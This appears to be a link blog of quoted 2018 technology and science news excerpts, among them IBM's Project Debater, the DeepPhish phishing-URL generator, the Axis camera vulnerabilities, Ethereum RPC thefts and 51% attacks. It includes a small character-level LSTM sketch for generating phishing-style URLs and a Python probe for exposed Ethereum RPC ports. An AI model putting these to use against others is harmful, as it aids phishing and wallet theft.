IBM AI Project Debater scores 1 – 1 vs man in 2 debates

The AI, called Project Debater, appeared on stage in a packed conference room at IBM’s San Francisco office embodied in a 6ft tall black panel with a blue, animated “mouth”. It was a looming presence alongside the human debaters Noa Ovadia and Dan Zafrir, who stood behind a podium nearby.

Although the machine stumbled at many points, the unprecedented event offered a glimpse into how computers are learning to grapple with the messy, unstructured world of human decision-making.

For each of the two short debates, participants had to prepare a four-minute opening statement, followed by a four-minute rebuttal and a two-minute summary. The opening debate topic was “we should subsidize space exploration”, followed by “we should increase the use of telemedicine”.

In both debates, the audience voted Project Debater to be worse at delivery but better in terms of the amount of information it conveyed. And in spite of several robotic slip-ups, the audience voted the AI to be more persuasive (in terms of changing the audience’s position) than its human opponent, Zafrir, in the second debate.

It’s worth noting, however, that there were many members of IBM staff in the room and they may have been rooting for their creation.

IBM hopes the research will eventually enable a more sophisticated virtual assistant that can absorb massive and diverse sets of information to help build persuasive arguments and make well-informed decisions – as opposed to merely responding to simple questions and commands.

Project Debater was a showcase of IBM’s ability to process very large data sets, including millions of news articles across dozens of subjects, and then turn snippets of arguments into full flowing prose – a challenging task for a computer.

[…]

Once an AI is capable of persuasive arguments, it can be applied as a tool to aid human decision-making.

“We believe there’s massive potential for good in artificial intelligence that can understand us humans,” said Arvind Krishna, director of IBM Research.

One example of this might be corporate boardroom decisions, where there are lots of conflicting points of view. The AI system could, without emotion, listen to the conversation, take all of the evidence and arguments into account and challenge the reasoning of humans where necessary.

“This can increase the level of evidence-based decision-making,” said Reed, adding that the same system could be used for intelligence analysis in counter-terrorism, for example identifying if a particular individual represents a threat.

In both cases, the machine wouldn’t make the decision but would contribute to the discussion and act as another voice at the table.

Source: Man 1, machine 1: landmark debate between AI and humans ends in draw | Technology | The Guardian

Essentially, Project Debater assigns a confidence score to every piece of information it understands. As in: how confident is the system that it actually understands the content of what’s being discussed? “If it’s confident that it got that point right, if it really believes it understands what that opponent was saying, it’s going to try to make a very strong argument against that point specifically,” Welser explains.

“If it’s less confident,” he says, “it’ll do its best to make an argument that’ll be convincing as an argument even if it doesn’t exactly answer that point. Which is exactly what a human does too, sometimes.”

So: the human says that government should have specific criteria surrounding basic human needs to justify subsidization. Project Debater responds that space is awesome and good for the economy. A human might choose that tactic as a sneaky way to avoid debating on the wrong terms. Project Debater had different motivations in its algorithms, but not that different.
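As an illustration of that behaviour, here is a purely hypothetical sketch of a confidence-gated rebuttal strategy; the function name, threshold and fallback argument are assumptions made for the example, not IBM’s implementation.

```python
# Hypothetical sketch of the confidence-gated strategy Welser describes.
# Threshold, names and the fallback argument are illustrative, not IBM's code.
def choose_rebuttal(opponent_point: str, understanding_confidence: float,
                    threshold: float = 0.8) -> str:
    if understanding_confidence >= threshold:
        # Confident it parsed the opponent correctly: attack that point directly.
        return f"Targeted rebuttal of: {opponent_point}"
    # Less confident: fall back to a strong, pre-built argument for its own side.
    return "General argument: space exploration pays for itself economically"

print(choose_rebuttal("Subsidies should be reserved for basic human needs", 0.55))
```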

The point of this experiment wasn’t to make me think that I couldn’t trust that a computer is arguing in good faith — though it very much did that. No, the point is that IBM is showing off that it can train AI in new areas of research that could eventually be useful in real, practical contexts.

The first is parsing a lot of information in a decision-making context. The same technology that can read a corpus of data and come up with a bunch of pros and cons for a debate could be (and has been) used to decide whether or not a stock might be worth investing in. IBM’s system didn’t make the value judgement, but it did provide a bunch of information to the bank showing both sides of a debate about the stock.

As for the debating part, Welser says that it “helps us understand how language is used,” by teaching a system to work in a rhetorical context that’s more nuanced than the usual Hey Google give me this piece of information and turn off my lights. Perhaps it might someday help a lawyer structure their arguments, “not that Project Debater would make a very good lawyer,” he joked. Another IBM researcher suggested that this technology could help judge fake news.

How close is this to being something IBM turns into a product? “This is still a research level project,” Welser says, though “the technologies underneath it right now” are already beginning to be used in IBM projects.

https://www.theverge.com/2018/6/18/17477686/ibm-project-debater-ai

The system listened to four minutes of its human opponent’s opening remarks, then parsed that data and created an argument that highlighted and attempted to debunk information shared by the opposing side. That’s incredibly impressive because it has to understand not only the words but the context of those words. Parroting back Wikipedia entries is easy; taking data and creating a narrative based not only on raw data but also on what it has just heard? That’s tough.

In a world where emotion and bias color all our decisions, Project Debater could help companies and governments see through the noise of our life experiences and produce mostly impartial conclusions. Of course, the data set it pulls from is based on what humans have written, and that writing carries its own biases and emotions.

While the goal is an unbiased machine, during the discourse Project Debater wasn’t completely sterile. Amid its rebuttal against debater Dan Zafrir, while they argued about telemedicine expansion, the system stated that Zafrir had not told the truth during his opening statement about the increase in the use of telemedicine. In other words, it called him a liar.

When asked about the statement, Slonim said that the system has a confidence threshold during rebuttals. If it’s feeling very confident it creates a more complex statement. If it’s feeling less confident, the statement is less impressive.

https://www.engadget.com/2018/06/18/ibm-s-project-debater-is-an-ai-thats-ready-to-argue/?guccounter=1

IBM site

https://www.research.ibm.com/artificial-intelligence/project-debater/

Here’s some phish-AI research: Machine-learning code crafts phishing URLs that dodge auto-detection

An artificially intelligent system has been demonstrated generating URLs for phishing websites that appear to evade detection by security tools.

Essentially, the software can come up with URLs for webpages that masquerade as legit login pages for real websites, when in actual fact the webpages simply collect the entered usernames and passwords to later hijack accounts.

Blacklists and algorithms – intelligent or otherwise – can be used to automatically identify and block links to phishing pages. Humans should be able to spot that the web links are dodgy, but not everyone is so savvy.

Using the Phishtank database, a group of computer scientists from Cyxtera Technologies, a cybersecurity biz based in Florida, USA, have built DeepPhish, machine-learning software that, allegedly, generates phishing URLs that beat these defense mechanisms.

[…]

The team inspected more than a million URLs on Phishtank to identify three different phishing miscreants who had generated webpages to steal people’s credentials. The team fed these web addresses into an AI-based phishing detection algorithm to measure how effective the URLs were at bypassing the system.

The first scumbag of the trio used 1,007 attack URLs across 106 domains, and only seven were effective at avoiding setting off alarms, a success rate of just 0.69 per cent. The second used 102 malicious web addresses across 19 domains; only five of them bypassed the threat detection algorithm, a success rate of 4.91 per cent.

Next, they fed this information into a Long Short-Term Memory (LSTM) network to learn the general structure of the malicious URLs and extract features from them – for example, the second threat actor commonly used “tdcanadatrustindex.html” in its addresses.

All the text from the effective URLs was taken to create sentences, encoded into vectors and fed into the LSTM, which is trained to predict the next character given the previous ones.
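For illustration, a character-level LSTM of the kind described can be sketched in a few lines of PyTorch; the training URL, vocabulary handling and hyperparameters below are assumptions made for the demo, not Cyxtera’s DeepPhish code.

```python
# Minimal character-level LSTM sketch of the kind of generator described above
# (an illustration of the technique, not Cyxtera's DeepPhish implementation).
import torch
import torch.nn as nn

urls = ["http://tdcanadatrustindex.html.example.com/login"]   # illustrative training URL(s)
chars = sorted(set("".join(urls)))
idx = {c: i for i, c in enumerate(chars)}

class CharLSTM(nn.Module):
    def __init__(self, vocab, hidden=64):
        super().__init__()
        self.emb = nn.Embedding(vocab, 16)
        self.lstm = nn.LSTM(16, hidden, batch_first=True)
        self.out = nn.Linear(hidden, vocab)

    def forward(self, x):
        h, _ = self.lstm(self.emb(x))
        return self.out(h)               # one next-character distribution per position

model = CharLSTM(len(chars))
opt = torch.optim.Adam(model.parameters(), lr=1e-3)

seq = torch.tensor([[idx[c] for c in urls[0]]])
inp, tgt = seq[:, :-1], seq[:, 1:]       # predict each next character from the previous ones
loss = nn.functional.cross_entropy(model(inp).transpose(1, 2), tgt)
loss.backward()
opt.step()
```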

Over time it learns to generate a stream of text to simulate a list of pseudo URLs that are similar to the ones used as input. When DeepPhish was trained on data from the first threat actor, it also managed to create 1,007 URLs, and 210 of them were effective at evading detection, bumping up the score from 0.69 per cent to 20.90 per cent.

When it was following the structure from the second threat actor, it also produced 102 fake URLs and 37 of them were successful, increasing the likelihood of tricking the existent defense mechanism from 4.91 per cent to 36.28 per cent.

The effectiveness rate isn’t very high because a lot of what comes out of the LSTM is effectively gibberish, containing strings of forbidden characters.

“It is important to automate the process of retraining the AI phishing detection system by incorporating the new synthetic URLs that each threat actor may create,” the researchers warned.

Source: Here’s some phish-AI research: Machine-learning code crafts phishing URLs that dodge auto-detection • The Register

EU sets up High-Level Group on Artificial Intelligence

Following an open selection process, the Commission has appointed 52 experts to a new High-Level Expert Group on Artificial Intelligence, comprising representatives from academia, civil society and industry.

The High-Level Expert Group on Artificial Intelligence (AI HLG) will have as a general objective to support the implementation of the European strategy on AI. This will include the elaboration of recommendations on future AI-related policy development and on ethical, legal and societal issues related to AI, including socio-economic challenges.

Moreover, the AI HLG will serve as the steering group for the European AI Alliance’s work, interact with other initiatives, help stimulate a multi-stakeholder dialogue, gather participants’ views and reflect them in its analysis and reports.

In particular, the group will be tasked to:

  1. Advise the Commission on next steps addressing AI-related mid to long-term challenges and opportunities through recommendations which will feed into the policy development process, the legislative evaluation process and the development of a next-generation digital strategy.
  2. Propose to the Commission draft AI ethics guidelines, covering issues such as fairness, safety, transparency, the future of work, democracy and, more broadly, the impact on the application of the Charter of Fundamental Rights, including privacy and personal data protection, dignity, consumer protection and non-discrimination.
  3. Support the Commission on further engagement and outreach mechanisms to interact with a broader set of stakeholders in the context of the AI Alliance, share information and gather their input on the group’s and the Commission’s work.

Source: High-Level Group on Artificial Intelligence | Digital Single Market

Significant Vulnerabilities in Axis Cameras – patch now!

One of the vendors for which we found vulnerable devices was Axis Communications. Our team discovered a critical chain of vulnerabilities in Axis security cameras. The vulnerabilities allow an adversary that obtained the camera’s IP address to remotely take over the cameras (via LAN or internet). In total, VDOO has responsibly disclosed seven vulnerabilities to Axis security team.

The vulnerabilities’ IDs in Mitre are: CVE-2018-10658, CVE-2018-10659, CVE-2018-10660, CVE-2018-10661, CVE-2018-10662, CVE-2018-10663 and CVE-2018-10664.

Chaining three of the reported vulnerabilities together allows an unauthenticated remote attacker with access to the camera login page over the network (without any prior access to the camera or credentials for it) to fully control the affected camera. An attacker with such control could do the following:

  • Access the camera’s video stream
  • Freeze the camera’s video stream
  • Control the camera – move the lens to a desired point, turn motion detection on/off
  • Add the camera to a botnet
  • Alter the camera’s software
  • Use the camera as an infiltration point for the network (performing lateral movement)
  • Render the camera useless
  • Use the camera to perform other nefarious tasks (DDoS attacks, Bitcoin mining, others)

The vulnerable products include 390 models of Axis IP Cameras. The full list of affected products can be found here. Axis uses the identifier ACV-128401 to refer to the issues we discovered.

To the best of our knowledge, these vulnerabilities were not exploited in the field and therefore did not lead to any concrete privacy violation or security threat to Axis’s customers.

We strongly recommend that Axis customers who have not updated their cameras’ firmware do so immediately, or mitigate the risks in alternative ways. See instructions in the FAQ section below.

We also recommend that other camera vendors follow our recommendations at the end of this report to avoid and mitigate similar threats.

Source: VDOO Discovers Significant Vulnerabilities in Axis Cameras – VDOO

Transforming Standard Video Into Slow Motion with AI

Researchers from NVIDIA developed a deep learning-based system that can produce high-quality slow-motion videos from a 30-frame-per-second video, outperforming various state-of-the-art methods that aim to do the same. The researchers will present their work at the annual Computer Vision and Pattern Recognition (CVPR) conference in Salt Lake City, Utah this week. 

“There are many memorable moments in your life that you might want to record with a camera in slow-motion because they are hard to see clearly with your eyes: the first time a baby walks, a difficult skateboard trick, a dog catching a ball,” the researchers wrote in the research paper.  “While it is possible to take 240-frame-per-second videos with a cell phone, recording everything at high frame rates is impractical, as it requires large memories and is power-intensive for mobile devices,” the team explained.

With this new research, users can slow down their recordings after taking them.

Using NVIDIA Tesla V100 GPUs and the cuDNN-accelerated PyTorch deep learning framework, the team trained their system on over 11,000 videos of everyday and sports activities shot at 240 frames per second. Once trained, the convolutional neural network predicted the extra frames.

The team used a separate dataset to validate the accuracy of their system.

The result can make videos shot at a lower frame rate look more fluid and less blurry.

“Our method can generate multiple intermediate frames that are spatially and temporally coherent,” the researchers said. “Our multi-frame approach consistently outperforms state-of-the-art single frame methods.”
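To make the idea concrete, here is a deliberately toy sketch of learned frame interpolation in PyTorch: a small CNN takes two neighbouring frames and predicts the frame between them, trained against the real intermediate frame from 240fps footage. This is an illustration only, not the researchers’ actual architecture, which also estimates optical flow between frames and can generate arbitrarily many intermediate frames.

```python
# Toy frame-interpolation model (illustrative only, not NVIDIA's architecture).
import torch
import torch.nn as nn

class ToyInterpolator(nn.Module):
    def __init__(self):
        super().__init__()
        self.net = nn.Sequential(
            nn.Conv2d(6, 32, 3, padding=1), nn.ReLU(),
            nn.Conv2d(32, 32, 3, padding=1), nn.ReLU(),
            nn.Conv2d(32, 3, 3, padding=1),
        )

    def forward(self, frame_a, frame_b):
        # Stack the two input frames along the channel axis and predict the middle frame.
        return self.net(torch.cat([frame_a, frame_b], dim=1))

model = ToyInterpolator()
a, b = torch.rand(1, 3, 128, 128), torch.rand(1, 3, 128, 128)   # frames at t and t+1
ground_truth_mid = torch.rand(1, 3, 128, 128)                   # real frame at t+0.5 from 240fps video
loss = nn.functional.l1_loss(model(a, b), ground_truth_mid)     # train to reconstruct it
loss.backward()
```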

To help demonstrate the research, the team took a series of clips from The Slow Mo Guys, a popular slow-motion based science and technology entertainment YouTube series created by Gavin Free, starring himself and his friend Daniel Gruchy, and made their videos even slower.

The method can take everyday videos of life’s most precious moments and slow them down to look like your favorite cinematic slow-motion scenes, adding suspense, emphasis, and anticipation.

Source: Transforming Standard Video Into Slow Motion with AI – NVIDIA Developer News CenterNVIDIA Developer News Center

Paper straw factory to open in Britain as restaurants ditch plastic

No paper straws have been made in Britain for the last several decades. But that is about to change as a group of packaging industry veterans prepare to open a dedicated paper straw production line in Ebbw Vale, Wales, making hundreds of millions of straws a year for McDonald’s and other food companies as they prepare for a ban on plastic straws in the UK.

“We spotted a huge opportunity, and we went for it,” said Mark Varney, sales and marketing director of the newly created paper straw manufacturer Transcend Packaging. “When the BBC’s Blue Planet II was on the telly and the government started talking about the dangers of plastic straws, we saw a niche in the market.”

Varney and his business partners, all stalwarts of the packaging industry, watched as chains including Costa Coffee, Wetherspoons and Pizza Express announced plans to phase out plastic straws in favour of biodegradable paper.

“It is great that all these businesses are phasing out plastic straws, but the problem for them was where to get paper ones from,” Varney said. “Everyone is having to import them from China, and when you look at the carbon footprint of that it kind of defeats the exercise.”

So Varney and his partners set about opening what they reckon will be the only paper straw production plant in Europe. “We set up this company to give the customers what they actually want: biodegradable paper straws made in the UK,” he said.

Transcend signed a deal last week to supply straws to 1,361 McDonald’s outlets from September. The deal was agreed before Transcend had made its first straw, as the company is still waiting on delivery of machines from China. McDonald’s uses 1.8m straws a day in the UK. The Northern Irish factory of the Finnish packaging company Huhtamaki will also supply McDonald’s but is understood not to have paper straw production capabilities yet.

Source: Paper straw factory to open in Britain as restaurants ditch plastic | Business | The Guardian

Climate Change Can Be Reversed by Turning Air Into Gasoline

A team of scientists from Harvard University and the company Carbon Engineering announced on Thursday that they have found a method to cheaply and directly pull carbon-dioxide pollution out of the atmosphere.

[…]

the new technique is noteworthy because it promises to remove carbon dioxide cheaply. As recently as 2011, a panel of experts estimated that it would cost at least $600 to remove a metric ton of carbon dioxide from the atmosphere.

The new paper says it can remove the same ton for as little as $94, and for no more than $232. At those rates, it would cost between $1 and $2.50 to remove the carbon dioxide released by burning a gallon of gasoline in a modern car.
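A quick sanity check of those per-gallon figures, assuming roughly 8.9 kg of CO2 released per gallon of gasoline burned (a standard EPA estimate, not a number from the article):

```python
# Back-of-envelope check: cost per tonne of CO2 removed -> cost per gallon of gasoline offset.
# Assumes ~8.9 kg CO2 per gallon burned (EPA estimate); the $94-$232 range is from the text above.
CO2_PER_GALLON_KG = 8.9
for cost_per_tonne in (94, 232):
    per_gallon = cost_per_tonne * CO2_PER_GALLON_KG / 1000
    print(f"${cost_per_tonne}/tonne -> ${per_gallon:.2f} per gallon")
# Prints roughly $0.84 and $2.06, in the same ballpark as the quoted $1 to $2.50.
```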

[…]

Their technique, while chemically complicated, does not rely on unprecedented science. In effect, Keith and his colleagues have grafted a cooling tower onto a paper mill. It has three major steps.

First, outside air is sucked into the factory’s “contactors” and exposed to an alkaline liquid. These contactors resemble industrial cooling towers: They have large fans to inhale air from the outside world, and they’re lined with corrugated plastic structures that allow as much air as possible to come into contact with the liquid. In a cooling tower, the air is meant to cool the liquid; but in this design, the air is meant to come into contact with the strong base. “CO2 is a weak acid, so it wants to be in the base,” said Keith.

Second, the now-watery liquid (containing carbon dioxide) is brought into the factory, where it undergoes a series of chemical reactions to separate the base from the acid. The liquid is frozen into solid pellets, slowly heated, and converted into a slurry. Again, these techniques have been borrowed from elsewhere in the chemical industry: “Taking CO2 out of a carbonate solution is what almost every paper mill in the world does,” Keith told me.

Finally, the carbon dioxide is combined with hydrogen and converted into liquid fuels, including gasoline, diesel, and jet fuel. This is in some ways the most conventional aspect of the process: Oil companies convert hydrocarbon gases into liquid fuels every day, using a set of chemical reactions called the Fischer-Tropsch process. But it’s key to Carbon Engineering’s business: It means the company can produce carbon-neutral hydrocarbons.

What does that mean? Consider an example: If you were to burn Carbon Engineering’s gas in your car, you would release carbon-dioxide pollution out of your tailpipe and into Earth’s atmosphere. But as this carbon dioxide came from the air in the first place, these emissions would not introduce any new CO2 to the atmosphere. Nor would any new oil have to be mined to power your car.

Source: Climate Change Can Be Reversed by Turning Air Into Gasoline – The Atlantic

Customer Rewards get a lot weirder if you think of them as separate transactions

Source: xkcd: Customer Rewards

Giant African baobab trees die suddenly after thousands of years

Some of Africa’s oldest and biggest baobab trees have abruptly died, wholly or in part, in the past decade, according to researchers.

The trees, aged between 1,100 and 2,500 years and in some cases as wide as a bus is long, may have fallen victim to climate change, the team speculated.

“We report that nine of the 13 oldest … individuals have died, or at least their oldest parts/stems have collapsed and died, over the past 12 years,” they wrote in the scientific journal Nature Plants, describing “an event of an unprecedented magnitude”.

“It is definitely shocking and dramatic to experience during our lifetime the demise of so many trees with millennial ages,” said the study’s co-author Adrian Patrut of the Babeș-Bolyai University in Romania.

Among the nine were four of the largest African baobabs. While the cause of the die-off remains unclear, the researchers “suspect that the demise of monumental baobabs may be associated at least in part with significant modifications of climate conditions that affect southern Africa in particular”.

Further research is needed, said the team from Romania, South Africa and the United States, “to support or refute this supposition”.

Between 2005 and 2017, the researchers probed and dated “practically all known very large and potentially old” African baobabs – more than 60 individuals in all. Collating data on girth, height, wood volume and age, they noted the “unexpected and intriguing fact” that most of the very oldest and biggest trees died during the study period. All were in southern Africa – Zimbabwe, Namibia, South Africa, Botswana, and Zambia.

The baobab is the biggest and longest-living flowering tree, according to the research team. It is found naturally in Africa’s savannah region and outside the continent in tropical areas to which it was introduced. It is a strange-looking plant, with branches resembling gnarled roots reaching for the sky, giving it an upside-down look.

Source: Giant African baobab trees die suddenly after thousands of years | World news | The Guardian

A.I. Can Track Human Bodies Through Walls Now, With Just a Wifi Signal

A new piece of software has been trained to use wifi signals — which pass through walls, but bounce off living tissue — to monitor the movements, breathing, and heartbeats of humans on the other side of those walls. The researchers say this new tech’s promise lies in areas like remote healthcare, particularly elder care, but it’s hard to ignore slightly more dystopian applications.

[…]

“We actually are tracking 14 different joints on the body … the head, the neck, the shoulders, the elbows, the wrists, the hips, the knees, and the feet,” Katabi said. “So you can get the full stick-figure that is dynamically moving with the individuals that are obstructed from you — and that’s something new that was not possible before.”

An animation created by the RF-Pose software as it translates a wifi signal into a visual of human motion behind a wall.

The technology works a little bit like radar, but to teach their neural network how to interpret these granular bits of human activity, the team at MIT’s Computer Science and Artificial Intelligence Laboratory (CSAIL) had to create two separate A.I.s: a student and a teacher.

[…]

the team developed one A.I. program that monitored human movements with a camera, on one side of a wall, and fed that information to their wifi X-ray A.I., called RF-Pose, as it struggled to make sense of the radio waves passing through that wall on the other side.
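In essence this is cross-modal teacher-student training: the camera-based network provides the labels, and the RF network learns to reproduce them from radio data alone. The toy loop below illustrates that setup with random tensors; the network shapes, the 2-channel RF input and the 28-value output (14 joints times x and y) are assumptions for the sketch, not CSAIL’s RF-Pose code.

```python
# Toy cross-modal teacher-student step (illustrative only, not the RF-Pose implementation).
import torch
import torch.nn as nn

# Stand-in networks: the "teacher" sees camera frames, the "student" sees RF heatmaps.
teacher = nn.Sequential(nn.Conv2d(3, 8, 3, padding=1), nn.AdaptiveAvgPool2d(1),
                        nn.Flatten(), nn.Linear(8, 28))   # 14 joints x (x, y)
student = nn.Sequential(nn.Conv2d(2, 8, 3, padding=1), nn.AdaptiveAvgPool2d(1),
                        nn.Flatten(), nn.Linear(8, 28))
opt = torch.optim.Adam(student.parameters(), lr=1e-3)

camera_frames = torch.rand(4, 3, 64, 64)   # synchronised camera view (visible side of the wall)
rf_heatmaps = torch.rand(4, 2, 64, 64)     # radio reflections of the same scene

with torch.no_grad():
    target = teacher(camera_frames)        # the camera network supplies the pose labels
pred = student(rf_heatmaps)                # the RF network predicts the same pose from radio only
loss = nn.functional.mse_loss(pred, target)
loss.backward()
opt.step()
```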

 

Source: A.I. Can Track Human Bodies Through Walls Now, With Just a Wifi Signal | Inverse

A machine has figured out Rubik’s Cube all by itself – using a reverse technique called autodidactic iteration

In these scenarios, a deep-learning machine is given the rules of the game and then plays against itself. Crucially, it is rewarded at each step according to how it performs. This reward process is hugely important because it helps the machine to distinguish good play from bad play. In other words, it helps the machine learn.

But this doesn’t work in many real-world situations, because rewards are often rare or hard to determine.

For example, random turns of a Rubik’s Cube cannot easily be rewarded, since it is hard to judge whether the new configuration is any closer to a solution. And a sequence of random turns can go on for a long time without reaching a solution, so the end-state reward can only be offered rarely.

In chess, by contrast, there is a relatively large search space but each move can be evaluated and rewarded accordingly. That just isn’t the case for the Rubik’s Cube.

Enter Stephen McAleer and colleagues from the University of California, Irvine. These guys have pioneered a new kind of deep-learning technique, called “autodidactic iteration,” that can teach itself to solve a Rubik’s Cube with no human assistance. The trick that McAleer and co have mastered is to find a way for the machine to create its own system of rewards.

Here’s how it works. Given an unsolved cube, the machine must decide whether a specific move is an improvement on the existing configuration. To do this, it must be able to evaluate the move.

Autodidactic iteration does this by starting with the finished cube and working backwards to find a configuration that is similar to the proposed move. This process is not perfect, but deep learning helps the system figure out which moves are generally better than others.
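A minimal sketch of the “work backwards from the solved cube” idea is below: scramble the solved state move by move and use the scramble depth as a rough label for how far each state is from solved. This simplifies autodidactic iteration considerably (the real method bootstraps value and policy targets from the network itself), and `apply_move` and the state representation are hypothetical placeholders.

```python
import random

# Quarter-turn move set of the cube.
MOVES = ["U", "U'", "D", "D'", "L", "L'", "R", "R'", "F", "F'", "B", "B'"]

def backward_samples(apply_move, solved_state, max_depth=10):
    """Walk backwards from the solved cube, labelling each scrambled state with its
    scramble depth as a crude proxy for distance-to-solved.
    `apply_move(state, move)` is a hypothetical cube-simulator function."""
    samples, state = [], solved_state
    for depth in range(1, max_depth + 1):
        state = apply_move(state, random.choice(MOVES))
        samples.append((state, depth))
    return samples
```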

Having been trained, the network then uses a standard search tree to hunt for suggested moves for each configuration.

The result is an algorithm that performs remarkably well. “Our algorithm is able to solve 100% of randomly scrambled cubes while achieving a median solve length of 30 moves—less than or equal to solvers that employ human domain knowledge,” say McAleer and co.

That’s interesting because it has implications for a variety of other tasks that deep learning has struggled with, including puzzles like Sokoban, games like Montezuma’s Revenge, and problems like prime number factorization.

Indeed, McAleer and co have other goals in their sights: “We are working on extending this method to find approximate solutions to other combinatorial optimization problems such as prediction of protein tertiary structure.”

Source: A machine has figured out Rubik’s Cube all by itself – MIT Technology Review

Bitcoin Price: ‘Bloody Sunday’ Not Caused by Coinrail Hack

As CCN reported, the little-known Coinrail became the latest cryptocurrency exchange to fall prey to hackers, who are said to have made off with approximately $40 million worth of tokens, a fairly pedestrian figure relative to some of the hacks seen over the years.

Later that day, the bitcoin price began to careen downwards, taking every other major cryptocurrency with it. This led some observers to draw the conclusion that the two events were linked.

Writing in market commentary made available to CCN, Greenspan said that “there is absolutely no reason why this smash and grab job at a local boutique should have sent bitcoin down by $1,000.”

While the bitcoin price did experience a small decline in the immediate aftermath of the report that an exchange had been hacked, Greenspan noted that the bulk of the decline came more than 15 hours later and that the scale of the pullback was entirely disproportionate to both the size of the hack and Coinrail’s significance in the cryptocurrency ecosystem.

The bitcoin price declined after the Coinrail hack was first reported, but the major drop occurred more than 15 hours later. | Source: eToro

He argued that the decline was instead a technical correction, as most of it occurred immediately after the bitcoin price broke beneath its long-term trendline and moved closer to two key support levels.

“Though the CoinRail hack may have set us off-track, I don’t think that this will have very significant ramifications in the long run,” he said. “The industry has certainly seen much bigger hacks before and other than a technical price level, this doesn’t change much for the path of the industry over the next five years.”

Source: Bitcoin Price: ‘Bloody Sunday’ Not Caused by Coinrail Hack

Hackers Stole Over $20 Million From Misconfigured Ethereum Clients

A group of hackers has stolen over $20 million worth of Ethereum from Ethereum-based apps and mining rigs, Chinese cyber-security firm Qihoo 360 Netlab reported today.

The cause of these thefts is Ethereum software applications that have been configured to expose an RPC [Remote Procedure Call] interface on port 8545.

The purpose of this interface is to provide access to a programmatic API that an approved third-party service or app can query to interact with, or retrieve data from, the original Ethereum-based service – such as a miner or wallet application that users or companies have set up for mining or managing funds.

Because of its role, this RPC interface grants access to some pretty sensitive functions, allowing a third-party app the ability to retrieve private keys, move funds, or retrieve the owner’s personal details.

As such, this interface comes disabled by default in most apps, and is usually accompanied by a warning from the original app’s developers not to turn it on unless properly secured by an access control list (ACL), a firewall, or other authentication systems.

Almost all Ethereum-based software comes with an RPC interface nowadays, and in most cases, even when turned on, they are appropriately configured to listen to requests only via the local interface (127.0.0.1), meaning from apps running on the same machine as the original mining/wallet app that exposes the RPC interface.
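For administrators who want to audit their own nodes, a check for an exposed JSON-RPC endpoint can be as simple as the sketch below: it POSTs a standard `eth_accounts` request to port 8545 and reports whether a JSON-RPC answer comes back. The host, port and timeout are illustrative; run it only against machines you own.

```python
# Minimal probe for an exposed Ethereum JSON-RPC interface (audit your own nodes only).
import requests

def rpc_exposed(host, port=8545, timeout=3):
    payload = {"jsonrpc": "2.0", "method": "eth_accounts", "params": [], "id": 1}
    try:
        r = requests.post(f"http://{host}:{port}", json=payload, timeout=timeout)
        return "result" in r.json()   # any valid JSON-RPC reply means the interface is reachable
    except (requests.RequestException, ValueError):
        return False

print(rpc_exposed("127.0.0.1"))       # True here is fine; True from a remote address is the problem
```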

Some users don’t like to read the documentation

But across the years, developers have been known to tinker with their Ethereum apps, sometimes without knowing what they are doing.

This isn’t a new issue. Months after its launch, the Ethereum Project sent out an official security advisory to warn that some of the users of the geth Ethereum mining software were running mining rigs with this interface open to remote connections, allowing attackers to steal their funds.

But despite the warning from the official Ethereum devs, users have continued to misconfigure their Ethereum clients over the years, and many have reported losing funds out of the blue – losses that were later traced back to exposed RPC interfaces.

Source: Hackers Stole Over $20 Million From Misconfigured Ethereum Clients

Blockchain’s Once-Feared 51% Attack Is Now Becoming Regular among smaller coins

Monacoin, bitcoin gold, zencash, verge and now, litecoin cash.

At least five cryptocurrencies have recently been hit with an attack that used to be more theoretical than actual, all in the last month. In each case, attackers have been able to amass enough computing power to compromise these smaller networks, rearrange their transactions and abscond with millions of dollars in an effort that’s perhaps the crypto equivalent of a bank heist.

More surprising, though, may be that so-called 51% attacks are a well-known and dangerous cryptocurrency attack vector – and yet they are only now being exploited in earnest.

While there have been some instances of such attacks working successfully in the past, they haven’t exactly been all that common. They’ve been so rare, some technologists have gone as far as to argue miners on certain larger blockchains would never fall victim to one. The age-old (in crypto time) argument? It’s too costly and they wouldn’t get all that much money out of it.

But that doesn’t seem to be the case anymore.

NYU computer science researcher Joseph Bonneau released research last year featuring estimates of how much money it would cost to execute these attacks on top blockchains by simply renting power, rather than buying all the equipment.

One conclusion he drew? These attacks were likely to increase. And, it turns out he was right.

“Generally, the community thought this was a distant threat. I thought it was much less distant and have been trying to warn of the risk,” he told CoinDesk, adding:

“Even I didn’t think it would start happening this soon.”

Inside the attacks

Stepping back, cryptocurrencies aim to solve a long-standing computer science issue called the “double spend problem.”

Essentially, without creating an incentive for computers to monitor and prevent bad behavior, messaging networks were unable to act as money systems. In short, they couldn’t prevent someone from spending the same piece of data five or even 1,000 times at once (without trusting a third party to do all the dirty work).

That’s the entire reason they work as they do, with miners (a term that denotes the machines necessary to run blockchain software) consuming electricity and making sure no one’s money is getting stolen.

To make money using this attack vector, hackers need a few pieces to be in place. For one, an attacker can’t do anything they want when they’ve racked up a majority of the hashing power. But they are able to double spend transactions under certain conditions.

It wouldn’t make sense to amass all this expensive hashing power to double spend a $3 transaction on a cup of coffee. An attacker will only benefit from this investment if they’re able to steal thousands or even millions of dollars.

As such, hackers have found various clever ways of making sure the conditions are just right to make them extra money. That’s why attackers of monacoin, bitcoin gold, zencash and litecoin cash have all targeted exchanges holding millions in cryptocurrency.

By amassing more than half of the network’s hashing power, the bitcoin gold attacker was able to double spend two very expensive transactions sent to an exchange.

Through three successful attacks on zencash (a lesser-known cryptocurrency that’s a fork of a fork of the privacy-minded Zcash), the attacker was able to run off with more than 21,000 zen (the zencash token), worth well over $500,000 at the time of writing.

The attack on verge was a bit different, though, since the attacker exploited insecure rules to confuse the network into giving him or her money. Though it’s clear the attacks targeted verge’s lower protocol layer, researchers are debating whether they technically constitute 51% attacks.

Small coins at risk

But, if these attacks were uncommon for such a long time, why are we suddenly seeing a burst of them?

In conversation with CoinDesk, researchers argued there isn’t a single, clear reason. Rather, there are a number of factors that likely contributed. For example, it’s no coincidence that smaller coins are the ones being attacked. Since they have attracted fewer miners, it’s easier to buy (or rent) the computing power needed to build up a majority share of the network.

Further, zencash co-creator Rob Viglione argued that the rise of mining marketplaces – where users can effectively rent mining hardware without buying it, setting it up and running it – has made attacks easier, since attackers can use these services to buy up a ton of mining power all at once, without having to spend the time or money to set up their own miners.

Meanwhile, it’s grown easier to execute attacks as these marketplaces have amassed more hashing power.

“Hackers are now realizing it can be used to attack networks,” he said.

As a data point for this, someone even erected a website, Crypto51, showing how expensive it is to 51% attack various blockchains using a mining marketplace (in this instance, one called NiceHash). Attacking bytecoin, for example, might cost as little as $719 using rented computing power.
